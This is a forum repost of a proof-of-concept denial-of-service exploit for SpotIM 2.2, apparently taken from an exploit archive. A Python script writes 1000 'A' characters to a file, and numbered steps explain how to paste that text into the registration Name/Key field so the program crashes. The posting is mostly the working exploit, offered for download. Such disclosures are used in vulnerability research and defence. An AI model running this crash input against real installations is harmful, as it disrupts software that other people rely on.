SpotIM 2.2 Denial Of Service

  1. 3 months ago
    Edited 3 months ago by Men in Black

    h114.png

    SpotIM version 2.2 denial of service proof of concept exploit.

    MD5 | e00d56659cc1b271c52df57fe932349c

    Download => spotim22-dos.txt

    # -*- coding: utf-8 -*-
    # Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
    # Date: 09/05/2019
    # Author: Alejandra Sánchez
    # Vendor Homepage: http://www.nsauditor.com
    # Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
    # Version: 2.2
    # Tested on: Windows 10
    
    # Proof of Concept:
    # 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
    # 2.- Copy the text from the generated SpotIM.txt file to clipboard
    # 3.- Open SpotIM
    # 4.  Select "Register" > "Enter Registration Code..."
    # 5.- Paste clipboard in the Name/Key field 
    # 6.- Click 'OK'
    # 7.- Crashed
    
    buffer = "\x41" * 1000
    f = open ("SpotIM.txt", "w")
    f.write(buffer)
    f.close()
 

or Sign Up to reply!